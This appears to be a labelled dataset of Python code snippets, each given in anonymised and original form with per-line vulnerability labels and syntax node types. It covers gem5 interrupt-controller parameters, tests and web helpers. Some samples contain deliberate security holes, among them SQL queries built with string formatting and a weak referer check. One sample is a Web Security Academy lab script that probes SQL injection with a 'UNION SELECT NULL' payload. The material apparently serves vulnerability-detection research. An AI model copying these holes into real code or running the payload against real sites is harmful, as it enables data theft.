"gicd_pidr = Param.UInt32(0, 'Peripheral Identification Register')\n",
"gicc_iidr = Param.UInt32(0, 'CPU Interface Identification Register')\n",
"gicv_iidr = Param.UInt32(0, 'VM CPU Interface Identification Register')\n",
"type = 'ArmInterruptPin'\n",
"cxx_header = 'dev/arm/base_gic.hh'\n",
"cxx_class = 'ArmInterruptPinGen'\n",
"abstract = True\n",
"platform = Param.Platform(Parent.any, 'Platform with interrupt controller')\n",
"num = Param.UInt32('Interrupt number in GIC')\n",
"type = 'ArmSPI'\n",
"cxx_header = 'dev/arm/base_gic.hh'\n",
"cxx_class = 'ArmSPIGen'\n",
"type = 'ArmPPI'\n",
"cxx_header = 'dev/arm/base_gic.hh'\n",
"cxx_class = 'ArmPPIGen'\n",
"type = 'GicV2'\n",
"cxx_header = 'dev/arm/gic_v2.hh'\n",
"dist_addr = Param.Addr('Address for distributor')\n",
"cpu_addr = Param.Addr('Address for cpu')\n",
"cpu_size = Param.Addr(8192, 'Size of cpu register bank')\n",
"dist_pio_delay = Param.Latency('10ns', 'Delay for PIO r/w to distributor')\n",
"cpu_pio_delay = Param.Latency('10ns', 'Delay for PIO r/w to cpu interface')\n",
"int_latency = Param.Latency('10ns', 'Delay for interrupt to get to CPU')\n",
"it_lines = Param.UInt32(128, 'Number of interrupt lines supported (max = 1020)'\n )\n",
"gem5_extensions = Param.Bool(False, 'Enable gem5 extensions')\n",
"\"\"\"\n As defined in:\n \"ARM Generic Interrupt Controller Architecture\" version 2.0\n \"CoreLink GIC-400 Generic Interrupt Controller\" revision r0p1\n \"\"\"\n",
"gicd_pidr = 2864272\n",
"gicd_iidr = 33559611\n",
"gicc_iidr = 33690683\n",
"gicv_iidr = gicc_iidr\n",
"type = 'Gicv2mFrame'\n",
"cxx_header = 'dev/arm/gic_v2m.hh'\n",
"spi_base = Param.UInt32(0, 'Frame SPI base number')\n",
"spi_len = Param.UInt32(0, 'Frame SPI total number')\n",
"addr = Param.Addr('Address for frame PIO')\n",
"type = 'Gicv2m'\n",
"cxx_header = 'dev/arm/gic_v2m.hh'\n",
"pio_delay = Param.Latency('10ns', 'Delay for PIO r/w')\n",
"gic = Param.BaseGic(Parent.any, 'Gic on which to trigger interrupts')\n",
"frames = VectorParam.Gicv2mFrame([], 'Power of two number of frames')\n",
"type = 'VGic'\n",
"cxx_header = 'dev/arm/vgic.hh'\n",
"gic = Param.BaseGic(Parent.any, 'Gic to use for interrupting')\n",
"platform = Param.Platform(Parent.any, 'Platform this device is part of.')\n",
"vcpu_addr = Param.Addr(0, 'Address for vcpu interfaces')\n",
"hv_addr = Param.Addr(0, 'Address for hv control')\n",
"pio_delay = Param.Latency('10ns', 'Delay for PIO r/w')\n",
"maint_int = Param.UInt32('HV maintenance interrupt number')\n",
"gicv_iidr = Param.UInt32(Self.gic.gicc_iidr,\n 'VM CPU Interface Identification Register')\n",
"def generateDeviceTree(self, state):...\n",
"gic = self.gic.unproxy(self)\n",
"node = FdtNode('interrupt-controller')\n",
"node.appendCompatible(['gem5,gic', 'arm,cortex-a15-gic', 'arm,cortex-a9-gic'])\n",
"node.append(FdtPropertyWords('#interrupt-cells', [3]))\n",
"node.append(FdtPropertyWords('#address-cells', [0]))\n",
"node.append(FdtProperty('interrupt-controller'))\n",
"regs = state.addrCells(gic.dist_addr) + state.sizeCells(4096\n ) + state.addrCells(gic.cpu_addr) + state.sizeCells(4096\n ) + state.addrCells(self.hv_addr) + state.sizeCells(8192\n ) + state.addrCells(self.vcpu_addr) + state.sizeCells(8192)\n",
"node.append(FdtPropertyWords('reg', regs))\n",
"node.append(FdtPropertyWords('interrupts', [1, int(self.maint_int) - 16, 3844])\n )\n",
"node.appendPhandle(gic)\n",
"yield node\n",
"type = 'Gicv3'\n",
"cxx_header = 'dev/arm/gic_v3.hh'\n",
"dist_addr = Param.Addr('Address for distributor')\n",
"dist_pio_delay = Param.Latency('10ns', 'Delay for PIO r/w to distributor')\n",
"redist_addr = Param.Addr('Address for redistributors')\n",
"redist_pio_delay = Param.Latency('10ns', 'Delay for PIO r/w to redistributors')\n",
"it_lines = Param.UInt32(1020,\n 'Number of interrupt lines supported (max = 1020)')\n",
"maint_int = Param.ArmInterruptPin(\n 'HV maintenance interrupt.ARM strongly recommends that maintenance interrupts are configured to use INTID 25 (PPI Interrupt).'\n )\n",
"cpu_max = Param.Unsigned(256,\n 'Maximum number of PE. This is affecting the maximum number of redistributors'\n )\n",
"gicv4 = Param.Bool(True, 'GICv4 extension available')\n"
] | [
0,
0,
0,
0,
2,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Expr'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"FunctionDef'",
"Assign'",
"Assign'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Assign'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'"
] |
[
"def FUNC_2(self):...\n",
""
] | [
"def tearDown(self):...\n",
""
] | [
0,
0
] | [
"FunctionDef'",
"Condition"
] |
[
"def FUNC_10(self):...\n",
"\"\"\"docstring\"\"\"\n",
"if self._validated_binaries:\n",
"return\n",
"if self._minimum_version:\n",
"VAR_2 = self._get_version(VAR_12)\n",
"if self._maximum_version:\n",
"if VAR_2 < self._minimum_version:\n",
"VAR_2 = self._get_version(VAR_12)\n",
"self._bin_path = os.path.join(self.home, 'bin')\n",
"if VAR_2 > self._maximum_version:\n",
"self._validated_executable('javac')\n",
"if self._jdk:\n",
"self._is_jdk = True\n",
"VAR_0.debug(\n 'Failed to validate javac executable. Please check you have a JDK installed. Original error: {}'\n .format(e))\n"
] | [
"def validate(self):...\n",
"\"\"\"docstring\"\"\"\n",
"if self._validated_binaries:\n",
"return\n",
"if self._minimum_version:\n",
"version = self._get_version(java)\n",
"if self._maximum_version:\n",
"if version < self._minimum_version:\n",
"version = self._get_version(java)\n",
"self._bin_path = os.path.join(self.home, 'bin')\n",
"if version > self._maximum_version:\n",
"self._validated_executable('javac')\n",
"if self._jdk:\n",
"self._is_jdk = True\n",
"logger.debug(\n 'Failed to validate javac executable. Please check you have a JDK installed. Original error: {}'\n .format(e))\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"Condition",
"Return'",
"Condition",
"Assign'",
"Condition",
"Condition",
"Assign'",
"Assign'",
"Condition",
"Expr'",
"Condition",
"Assign'",
"Expr'"
] |
[
"def FUNC_7(self):...\n",
"return self.groups\n"
] | [
"def get_groups(self):...\n",
"return self.groups\n"
] | [
0,
0
] | [
"FunctionDef'",
"Return'"
] |
[
"def FUNC_18(self):...\n",
"def FUNC_24():...\n",
"VAR_15 = self.mock_nsx_clustered_api(session_response=connect_timeout)\n",
"VAR_15._validate = mock.Mock()\n",
"self.assertRaises(nsxlib_exc.ServiceClusterUnavailable, VAR_15.get,\n 'api/v1/transport-zones')\n"
] | [
"def test_cluster_proxy_connection_error(self):...\n",
"def connect_timeout():...\n",
"api = self.mock_nsx_clustered_api(session_response=connect_timeout)\n",
"api._validate = mock.Mock()\n",
"self.assertRaises(nsxlib_exc.ServiceClusterUnavailable, api.get,\n 'api/v1/transport-zones')\n"
] | [
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"FunctionDef'",
"Assign'",
"Assign'",
"Expr'"
] |
[
"def FUNC_3(self, VAR_8, VAR_9):...\n",
"for line in VAR_8:\n",
"if line.startswith(VAR_9):\n",
"return\n",
"return line[len(VAR_9):]\n"
] | [
"def _get_prefixed_value(self, lines, prefix):...\n",
"for line in lines:\n",
"if line.startswith(prefix):\n",
"return\n",
"return line[len(prefix):]\n"
] | [
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"For",
"Condition",
"Return'",
"Return'"
] |
[
"def FUNC_4(self, VAR_7):...\n",
"\"\"\"docstring\"\"\"\n",
"VAR_17 = self.session.get('https://www.kijiji.ca/m-my-ads.html')\n",
"VAR_18 = {'Action': 'DELETE_ADS', 'Mode': 'ACTIVE', 'needsRedirect':\n 'false', 'ads':\n '[{{\"adId\":\"{}\",\"reason\":\"PREFER_NOT_TO_SAY\",\"otherReason\":\"\"}}]'.\n format(VAR_7), 'ca.kijiji.xsrf.token': FUNC_0(VAR_17.text,\n 'ca.kijiji.xsrf.token')}\n",
"VAR_14 = self.session.post('https://www.kijiji.ca/j-delete-ad.json', VAR_11\n =params)\n",
"if 'OK' not in VAR_14.text:\n"
] | [
"def delete_ad(self, ad_id):...\n",
"\"\"\"docstring\"\"\"\n",
"my_ads_page = self.session.get('https://www.kijiji.ca/m-my-ads.html')\n",
"params = {'Action': 'DELETE_ADS', 'Mode': 'ACTIVE', 'needsRedirect':\n 'false', 'ads':\n '[{{\"adId\":\"{}\",\"reason\":\"PREFER_NOT_TO_SAY\",\"otherReason\":\"\"}}]'.\n format(ad_id), 'ca.kijiji.xsrf.token': get_token(my_ads_page.text,\n 'ca.kijiji.xsrf.token')}\n",
"resp = self.session.post('https://www.kijiji.ca/j-delete-ad.json', data=params)\n",
"if 'OK' not in resp.text:\n"
] | [
0,
0,
0,
5,
0,
5
] | [
"FunctionDef'",
"Docstring",
"Assign'",
"Assign'",
"Assign'",
"Condition"
] |
[
"def FUNC_11(self):...\n",
"self.run_test_case(self.scenario.create_server_group(), timeout_ok=True)\n"
] | [
"def test_c_create_server_group(self):...\n",
"self.run_test_case(self.scenario.create_server_group(), timeout_ok=True)\n"
] | [
0,
0
] | [
"FunctionDef'",
"Expr'"
] |
[
"def FUNC_3(self):...\n",
"return self.name\n"
] | [
"def get_name(self):...\n",
"return self.name\n"
] | [
0,
0
] | [
"FunctionDef'",
"Return'"
] |
[
"def FUNC_0(VAR_0=['POST', 'GET', 'PUT', 'DELETE']):...\n",
"\"\"\"docstring\"\"\"\n",
"def FUNC_5(VAR_1, *VAR_2, **VAR_3):...\n",
"def FUNC_6():...\n",
"if not request.method in VAR_0:\n",
"return True\n",
"if not request.environ.get('AUTH_TYPE') == 'cookie':\n",
"return True\n",
"if config.get('skip_authentication'):\n",
"return True\n",
"if request.environ.get('HTTP_REFERER'):\n",
"VAR_7 = urlparse(request.environ.get('HTTP_REFERER'))\n",
"if request.method == 'GET' and FUNC_4():\n",
"VAR_8 = VAR_7.hostname\n",
"return True\n",
"return False\n",
"if VAR_7.port:\n",
"VAR_8 += ':' + str(VAR_7.port)\n",
"if VAR_8.endswith(request.environ['adhocracy.domain']):\n",
"if request.method != 'GET':\n",
"return True\n"
] | [
"def RequireInternalRequest(methods=['POST', 'GET', 'PUT', 'DELETE']):...\n",
"\"\"\"docstring\"\"\"\n",
"def _decorate(f, *a, **kw):...\n",
"def check():...\n",
"if not request.method in methods:\n",
"return True\n",
"if not request.environ.get('AUTH_TYPE') == 'cookie':\n",
"return True\n",
"if config.get('skip_authentication'):\n",
"return True\n",
"if request.environ.get('HTTP_REFERER'):\n",
"ref_url = urlparse(request.environ.get('HTTP_REFERER'))\n",
"if request.method == 'GET' and has_token():\n",
"ref_host = ref_url.hostname\n",
"return True\n",
"return False\n",
"if ref_url.port:\n",
"ref_host += ':' + str(ref_url.port)\n",
"if ref_host.endswith(request.environ['adhocracy.domain']):\n",
"if request.method != 'GET':\n",
"return True\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
5,
0,
0,
0,
0,
0,
0,
5,
0
] | [
"FunctionDef'",
"Docstring",
"FunctionDef'",
"FunctionDef'",
"Condition",
"Return'",
"Condition",
"Return'",
"Condition",
"Return'",
"Condition",
"Assign'",
"Condition",
"Assign'",
"Return'",
"Return'",
"Condition",
"AugAssign'",
"Condition",
"Condition",
"Return'"
] |
[
"@VAR_0.route('/crawling/autoend')...\n",
"VAR_14 = VAR_10.get('crawl_process_id', None)\n",
"if VAR_14 < 0:\n",
"return 'process already killed'\n",
"os.kill(VAR_14, signal.SIGTERM)\n",
"VAR_15 = VAR_10.get('crawl_start_time', None)\n",
"VAR_10['crawl_total_time'] = time.time() - VAR_15\n",
"flash('Time Limit reached - Crawler interrupted automatically', 'success')\n",
"return redirect(url_for('table_detection'))\n"
] | [
"@app.route('/crawling/autoend')...\n",
"p_id = session.get('crawl_process_id', None)\n",
"if p_id < 0:\n",
"return 'process already killed'\n",
"os.kill(p_id, signal.SIGTERM)\n",
"crawl_start_time = session.get('crawl_start_time', None)\n",
"session['crawl_total_time'] = time.time() - crawl_start_time\n",
"flash('Time Limit reached - Crawler interrupted automatically', 'success')\n",
"return redirect(url_for('table_detection'))\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"Condition",
"Assign'",
"Condition",
"Return'",
"Expr'",
"Assign'",
"Assign'",
"Expr'",
"Return'"
] |
[
"\"\"\"Handlers for customizing oauthclient endpoints.\"\"\"\n",
"import six\n",
"from flask import current_app, flash, redirect, render_template, request, session, url_for\n",
"from flask.ext.login import current_user\n",
"from functools import partial, wraps\n",
"from werkzeug.utils import import_string\n",
"from invenio.base.globals import cfg\n",
"from .client import oauth, signup_handlers\n",
"from .errors import OAuthClientError, OAuthError, OAuthRejectedRequestError, OAuthResponseError\n",
"from .forms import EmailSignUpForm\n",
"from .models import RemoteAccount, RemoteToken\n",
"from .utils import oauth_authenticate, oauth_get_user, oauth_register\n",
"def FUNC_0(VAR_0):...\n",
"\"\"\"docstring\"\"\"\n",
"return '%s_%s' % (cfg['OAUTHCLIENT_SESSION_KEY_PREFIX'], VAR_0)\n"
] | [
"\"\"\"Handlers for customizing oauthclient endpoints.\"\"\"\n",
"import six\n",
"from flask import current_app, flash, redirect, render_template, request, session, url_for\n",
"from flask.ext.login import current_user\n",
"from functools import partial, wraps\n",
"from werkzeug.utils import import_string\n",
"from invenio.base.globals import cfg\n",
"from .client import oauth, signup_handlers\n",
"from .errors import OAuthClientError, OAuthError, OAuthRejectedRequestError, OAuthResponseError\n",
"from .forms import EmailSignUpForm\n",
"from .models import RemoteAccount, RemoteToken\n",
"from .utils import oauth_authenticate, oauth_get_user, oauth_register\n",
"def token_session_key(remote_app):...\n",
"\"\"\"docstring\"\"\"\n",
"return '%s_%s' % (cfg['OAUTHCLIENT_SESSION_KEY_PREFIX'], remote_app)\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"Expr'",
"Import'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"FunctionDef'",
"Docstring",
"Return'"
] |
[
"def FUNC_1():...\n",
"VAR_6 = './data/input/'\n",
"VAR_7 = VAR_6 + 'download/'\n",
"VAR_8 = './data/temp/'\n",
"VAR_9 = './data/vcf/'\n",
"VAR_10 = './data/zarr/'\n",
"VAR_11 = './data/zarr_benchmark/'\n",
"VAR_12 = FUNC_0()\n",
"VAR_13 = VAR_12['command']\n",
"if VAR_13 == 'config':\n",
"VAR_14 = VAR_12['output_config']\n",
"if VAR_13 == 'setup':\n",
"VAR_15 = VAR_12['f']\n",
"print('[Setup] Setting up benchmark data.')\n",
"if VAR_13 == 'exec':\n",
"config.generate_default_config_file(output_location=output_config_location,\n overwrite=overwrite_mode)\n",
"data_service.remove_directory_tree(VAR_9)\n",
"print('[Exec] Executing benchmark tool.')\n",
"print('Error: Unexpected command specified. Exiting...')\n",
"data_service.remove_directory_tree(VAR_10)\n",
"VAR_16 = config.read_configuration(location=cli_arguments['config_file'])\n",
"sys.exit(1)\n",
"VAR_16 = config.read_configuration(location=cli_arguments['config_file'])\n",
"VAR_18 = config.VCFtoZarrConfigurationRepresentation(VAR_16)\n",
"VAR_17 = config.FTPConfigurationRepresentation(VAR_16)\n",
"if VAR_17.enabled:\n",
"print('[Setup][FTP] FTP module enabled. Running FTP download...')\n",
"print('[Setup][FTP] FTP module disabled. Skipping FTP download...')\n",
"data_service.fetch_data_via_ftp(VAR_17=ftp_config, local_directory=\n download_directory)\n",
"data_service.process_data_files(input_dir=input_directory, temp_dir=\n temp_directory, output_dir=vcf_directory)\n",
"VAR_18 = config.VCFtoZarrConfigurationRepresentation(VAR_16)\n",
"if VAR_18.enabled:\n",
"data_service.setup_vcf_to_zarr(input_vcf_dir=vcf_directory, output_zarr_dir\n =zarr_directory_setup, conversion_config=vcf_to_zarr_config)\n"
] | [
"def _main():...\n",
"input_directory = './data/input/'\n",
"download_directory = input_directory + 'download/'\n",
"temp_directory = './data/temp/'\n",
"vcf_directory = './data/vcf/'\n",
"zarr_directory_setup = './data/zarr/'\n",
"zarr_directory_benchmark = './data/zarr_benchmark/'\n",
"cli_arguments = get_cli_arguments()\n",
"command = cli_arguments['command']\n",
"if command == 'config':\n",
"output_config_location = cli_arguments['output_config']\n",
"if command == 'setup':\n",
"overwrite_mode = cli_arguments['f']\n",
"print('[Setup] Setting up benchmark data.')\n",
"if command == 'exec':\n",
"config.generate_default_config_file(output_location=output_config_location,\n overwrite=overwrite_mode)\n",
"data_service.remove_directory_tree(vcf_directory)\n",
"print('[Exec] Executing benchmark tool.')\n",
"print('Error: Unexpected command specified. Exiting...')\n",
"data_service.remove_directory_tree(zarr_directory_setup)\n",
"runtime_config = config.read_configuration(location=cli_arguments[\n 'config_file'])\n",
"sys.exit(1)\n",
"runtime_config = config.read_configuration(location=cli_arguments[\n 'config_file'])\n",
"vcf_to_zarr_config = config.VCFtoZarrConfigurationRepresentation(runtime_config\n )\n",
"ftp_config = config.FTPConfigurationRepresentation(runtime_config)\n",
"if ftp_config.enabled:\n",
"print('[Setup][FTP] FTP module enabled. Running FTP download...')\n",
"print('[Setup][FTP] FTP module disabled. Skipping FTP download...')\n",
"data_service.fetch_data_via_ftp(ftp_config=ftp_config, local_directory=\n download_directory)\n",
"data_service.process_data_files(input_dir=input_directory, temp_dir=\n temp_directory, output_dir=vcf_directory)\n",
"vcf_to_zarr_config = config.VCFtoZarrConfigurationRepresentation(runtime_config\n )\n",
"if vcf_to_zarr_config.enabled:\n",
"data_service.setup_vcf_to_zarr(input_vcf_dir=vcf_directory, output_zarr_dir\n =zarr_directory_setup, conversion_config=vcf_to_zarr_config)\n"
] | [
0,
7,
7,
7,
7,
7,
7,
0,
0,
0,
0,
0,
0,
0,
0,
0,
7,
0,
0,
7,
0,
0,
0,
0,
0,
0,
0,
0,
7,
7,
7,
0,
7
] | [
"FunctionDef'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Condition",
"Assign'",
"Condition",
"Assign'",
"Expr'",
"Condition",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Assign'",
"Expr'",
"Assign'",
"Assign'",
"Assign'",
"Condition",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Assign'",
"Condition",
"Expr'"
] |
[
"def FUNC_3(self):...\n",
"VAR_15 = self._server_popen.poll()\n",
"return VAR_15 is None\n"
] | [
"def _IsServerAlive(self):...\n",
"returncode = self._server_popen.poll()\n",
"return returncode is None\n"
] | [
0,
0,
0
] | [
"FunctionDef'",
"Assign'",
"Return'"
] |
[
"def FUNC_5(self):...\n",
"if not self.route:\n",
"return frappe.db.get_value('Blog Category', self.blog_category, 'route'\n ) + '/' + self.scrub(self.title)\n"
] | [
"def make_route(self):...\n",
"if not self.route:\n",
"return frappe.db.get_value('Blog Category', self.blog_category, 'route'\n ) + '/' + self.scrub(self.title)\n"
] | [
0,
0,
0
] | [
"FunctionDef'",
"Condition",
"Return'"
] |
[
"def FUNC_5(self, VAR_13, VAR_14, VAR_15=None):...\n",
"if VAR_14 == Qt.Horizontal and VAR_15 == Qt.DisplayRole:\n",
"return self.column_headers[VAR_13]\n"
] | [
"def headerData(self, num, orientation, role=None):...\n",
"if orientation == Qt.Horizontal and role == Qt.DisplayRole:\n",
"return self.column_headers[num]\n"
] | [
0,
0,
0
] | [
"FunctionDef'",
"Condition",
"Return'"
] |
[
"def FUNC_7(VAR_4):...\n",
"VAR_11 = FUNC_4(VAR_4)\n",
"VAR_9 = FUNC_0()\n",
"VAR_10 = VAR_9.cursor()\n",
"if VAR_11 is None:\n",
"VAR_11 = VAR_11 - 1\n",
"VAR_10.execute(\n \"\"\"\n INSERT INTO people(name,karma,shame) VALUES('{}',-1,0)\n \"\"\"\n .format(VAR_4))\n",
"VAR_2.error('Execution failed with error: {}'.format(e))\n",
"VAR_10.execute(\n \"\"\"\n UPDATE people SET karma = {0} WHERE name = '{1}'\n \"\"\"\n .format(VAR_11, VAR_4))\n",
"VAR_2.error('Execution failed with error: {}'.format(e))\n",
"VAR_9.commit()\n",
"VAR_9.commit()\n",
"VAR_2.debug('Inserted into karmadb -1 karma for {}'.format(VAR_4))\n",
"VAR_2.debug('Inserted into karmadb -1 karma for {}'.format(VAR_4))\n",
"VAR_9.close()\n",
"VAR_9.close()\n",
"return -1\n",
"return VAR_11\n"
] | [
"def karma_sub(name):...\n",
"karma = karma_ask(name)\n",
"db = db_connect()\n",
"cursor = db.cursor()\n",
"if karma is None:\n",
"karma = karma - 1\n",
"cursor.execute(\n \"\"\"\n INSERT INTO people(name,karma,shame) VALUES('{}',-1,0)\n \"\"\"\n .format(name))\n",
"logger.error('Execution failed with error: {}'.format(e))\n",
"cursor.execute(\n \"\"\"\n UPDATE people SET karma = {0} WHERE name = '{1}'\n \"\"\"\n .format(karma, name))\n",
"logger.error('Execution failed with error: {}'.format(e))\n",
"db.commit()\n",
"db.commit()\n",
"logger.debug('Inserted into karmadb -1 karma for {}'.format(name))\n",
"logger.debug('Inserted into karmadb -1 karma for {}'.format(name))\n",
"db.close()\n",
"db.close()\n",
"return -1\n",
"return karma\n"
] | [
0,
0,
0,
0,
0,
0,
4,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Assign'",
"Assign'",
"Assign'",
"Condition",
"Assign'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Return'",
"Return'"
] |
[
"import requests\n",
"import sys\n",
"from bs4 import BeautifulSoup\n",
"import re\n",
"VAR_0 = 'https://abcd.web-security-academy.net/'\n",
"VAR_0 = f'{VAR_0}page'\n",
"VAR_1 = {'category': 'Lifestyle'}\n",
"VAR_2 = [\"'UNION SELECT\", 'NULL', '--']\n",
"VAR_3 = {'category': f\"Lifestyle{' '.join(VAR_2)}\"}\n",
"VAR_4 = requests.Session()\n",
"VAR_5 = VAR_4.get(VAR_0, VAR_1=params)\n",
"if VAR_5.status_code == 404:\n",
"sys.exit('The session you are looking for has expired')\n",
"def FUNC_0(VAR_2, VAR_3):...\n",
"\"\"\"docstring\"\"\"\n",
"VAR_8 = VAR_4.get(VAR_0, VAR_1=sqli)\n",
"while not VAR_8.ok:\n",
"VAR_2.remove('--')\n",
"print(f\"There are {VAR_2.count('NULL')} columns\")\n",
"VAR_2.extend([',', 'NULL', '--'])\n",
"return VAR_2\n",
"VAR_3['category'] = f\"Lifestyle{' '.join(VAR_2)}\"\n",
"VAR_8 = VAR_4.get(VAR_0, VAR_1=sqli)\n"
] | [
"import requests\n",
"import sys\n",
"from bs4 import BeautifulSoup\n",
"import re\n",
"url = 'https://abcd.web-security-academy.net/'\n",
"url = f'{url}page'\n",
"params = {'category': 'Lifestyle'}\n",
"null = [\"'UNION SELECT\", 'NULL', '--']\n",
"sqli = {'category': f\"Lifestyle{' '.join(null)}\"}\n",
"api_session = requests.Session()\n",
"response = api_session.get(url, params=params)\n",
"if response.status_code == 404:\n",
"sys.exit('The session you are looking for has expired')\n",
"def sqli_union_lab_1(null, sqli):...\n",
"\"\"\"docstring\"\"\"\n",
"lab1 = api_session.get(url, params=sqli)\n",
"while not lab1.ok:\n",
"null.remove('--')\n",
"print(f\"There are {null.count('NULL')} columns\")\n",
"null.extend([',', 'NULL', '--'])\n",
"return null\n",
"sqli['category'] = f\"Lifestyle{' '.join(null)}\"\n",
"lab1 = api_session.get(url, params=sqli)\n"
] | [
0,
0,
0,
4,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"Import'",
"Import'",
"ImportFrom'",
"Import'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Condition",
"Expr'",
"FunctionDef'",
"Docstring",
"Assign'",
"Condition",
"Expr'",
"Expr'",
"Expr'",
"Return'",
"Assign'",
"Assign'"
] |